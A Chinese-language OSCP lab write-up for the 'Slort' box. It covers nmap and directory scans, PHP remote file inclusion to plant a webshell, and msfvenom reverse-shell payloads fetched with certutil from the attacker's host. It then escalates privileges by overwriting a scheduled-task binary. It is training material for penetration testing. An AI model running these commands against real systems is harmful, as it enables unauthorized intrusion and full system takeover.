OSCP靶场–Slort

考点(1.php 远程文件包含 2.定时任务提权)

1.nmap扫描

                                                                                                                 
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.178.53 -sV -sC -p-  --min-rate 5000 
Starting Nmap 7.92 ( https://nmap.org ) at 2024-02-24 04:37 EST
Nmap scan report for 192.168.178.53
Host is up (0.28s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
135/tcp   open  msrpc         Microsoft Windows RPC                                                              
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                      
445/tcp   open  microsoft-ds?                                                                                    
3306/tcp  open  mysql?                                                                                           
| fingerprint-strings:                                                                                           
|   DNSVersionBindReqTCP, JavaRMI, LPDString, NULL:                                                              
|_    Host '192.168.45.179' is not allowed to connect to this MariaDB server                                     
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:4443/dashboard/                                                   
5040/tcp  open  unknown                                                                                          
7680/tcp  open  pando-pub?                                                                                       
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)                             
|_http-open-proxy: Proxy might be redirecting requests                                                           
| http-title: Welcome to XAMPP                                                                                   
|_Requested resource was http://192.168.178.53:8080/dashboard/                                                   
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6                                             
49664/tcp open  msrpc         Microsoft Windows RPC                                                              
49665/tcp open  msrpc         Microsoft Windows RPC                                                              
49666/tcp open  msrpc         Microsoft Windows RPC                                                              
49667/tcp open  msrpc         Microsoft Windows RPC                                                              
49668/tcp open  msrpc         Microsoft Windows RPC                                                                              
49669/tcp open  msrpc         Microsoft Windows RPC                                                                              
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :                                                                                      
SF-Port3306-TCP:V=7.92%I=7%D=2/24%Time=65D9B8F4%P=x86_64-pc-linux-gnu%r(NU                                                       
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x20al                                                       
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersio
SF:nBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20
SF:not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(
SF:LPDString,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Ja
SF:vaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.179'\x20is\x20not\x2
SF:0allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: -1s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-02-24T09:40:46
|_  start_date: N/AService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.85 seconds

2.user priv

2.1 目录扫描

┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.178.53:8080/_|. _ _  _  _  _ _|_    v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /root/.dirsearch/reports/192.168.178.53-8080/-_24-02-24_05-44-47.txtError Log: /root/.dirsearch/logs/errors-24-02-24_05-44-47.logTarget: http://192.168.178.53:8080/[05:44:48] Starting: 
[05:44:51] 403 -    1KB - /%C0%AE%C0%AE%C0%AF                              
[05:44:51] 403 -    1KB - /%3f/
[05:44:52] 403 -    1KB - /%ff                                             
[05:44:59] 403 -    1KB - /.ht_wsr.txt                                     
[05:44:59] 403 -    1KB - /.htaccess.bak1
[05:44:59] 403 -    1KB - /.htaccess.sample
[05:44:59] 403 -    1KB - /.htaccess.save                                  
[05:44:59] 403 -    1KB - /.htaccess.orig
[05:44:59] 403 -    1KB - /.htaccess_extra
[05:44:59] 403 -    1KB - /.htaccess_orig
[05:44:59] 403 -    1KB - /.htaccess_sc
[05:44:59] 403 -    1KB - /.htaccessBAK
[05:44:59] 403 -    1KB - /.htaccessOLD
[05:44:59] 403 -    1KB - /.htaccessOLD2
[05:44:59] 403 -    1KB - /.htm                                            
[05:44:59] 403 -    1KB - /.html                                           
[05:44:59] 403 -    1KB - /.htpasswd_test
[05:44:59] 403 -    1KB - /.htpasswds
[05:44:59] 403 -    1KB - /.httr-oauth
[05:45:17] 403 -    1KB - /Trace.axd::$DATA                                 
[05:45:19] 200 -  782B  - /Webalizer/                                       
[05:45:47] 403 -    1KB - /cgi-bin/                                         
[05:45:47] 500 -    1KB - /cgi-bin/printenv.pl                              
[05:45:52] 301 -  351B  - /dashboard  ->  http://192.168.178.53:8080/dashboard/
[05:45:52] 200 -    6KB - /dashboard/howto.html                             
[05:45:53] 200 -   31KB - /dashboard/faq.html                               
[05:45:53] 200 -   78KB - /dashboard/phpinfo.php                            
[05:45:59] 403 -    1KB - /error/                                           
[05:46:01] 200 -   30KB - /favicon.ico                                      
[05:46:02] 503 -    1KB - /examples                                         
[05:46:02] 503 -    1KB - /examples/                                        
[05:46:02] 503 -    1KB - /examples/servlet/SnoopServlet
[05:46:02] 503 -    1KB - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[05:46:02] 503 -    1KB - /examples/jsp/snp/snoop.jsp
[05:46:02] 503 -    1KB - /examples/servlets/servlet/CookieExample          
[05:46:02] 503 -    1KB - /examples/servlets/index.html
[05:46:02] 503 -    1KB - /examples/servlets/servlet/RequestHeaderExample
[05:46:06] 301 -  345B  - /img  ->  http://192.168.178.53:8080/img/         
[05:46:07] 302 -    0B  - /index.php  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.pHp  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php/login/  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 302 -    0B  - /index.php.  ->  http://192.168.178.53:8080/dashboard/
[05:46:07] 403 -    1KB - /index.php::$DATA                                 
[05:46:21] 403 -    1KB - /phpmyadmin/ChangeLog                             
[05:46:21] 403 -    1KB - /phpmyadmin/doc/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/docs/html/index.html
[05:46:21] 403 -    1KB - /phpmyadmin/README                                
[05:46:22] 403 -    1KB - /phpmyadmin                                       
[05:46:24] 403 -    1KB - /phpmyadmin/                                      
[05:46:24] 403 -    1KB - /phpmyadmin/index.php
[05:46:24] 403 -    1KB - /phpmyadmin/phpmyadmin/index.php                  
[05:46:24] 403 -    1KB - /phpmyadmin/scripts/setup.php
[05:46:31] 403 -    1KB - /server-status/                                   
[05:46:31] 403 -    1KB - /server-status
[05:46:31] 403 -    1KB - /server-info
[05:46:33] 301 -  346B  - /site  ->  http://192.168.178.53:8080/site/       
[05:46:34] 301 -   27B  - /site/  ->  index.php?page=main.php               
[05:46:46] 403 -    1KB - /web.config::$DATA                                
[05:46:46] 403 -    1KB - /webalizer                                        
[05:46:49] 200 -  774B  - /xampp/                                           Task Completed     

2.2 发现php LFI漏洞：

包含phpinfo.php文件：

2.3 发现存在php RFI漏洞：

2.4 利用RFI获取webshell:

php正向webshell地址：https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php

2.5 转到交互式shell

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o shell443.exe##
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80## webshell上传shell443.exe
## 执行shell443.exe##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443## local.txt
c:\Users\rupert\Desktop>type local.txt
type local.txt
345738c06042482d447a067226c9bfa7

local.txt

3.root priv

3.1 winpeas.exe:

## 
File: C:\xampp\phpMyAdmin\config.inc.php

3.2 发现定时任务：

3.3 覆盖定时任务二进制文件提权：

##
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -f exe -o TFTP.EXE ##
c:\Backup>certutil -urlcache -split -f http://192.168.45.179/TFTP.EXE##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443            

4.总结

## 考点：
### 1.远程文件包含
### 2.定时任务提权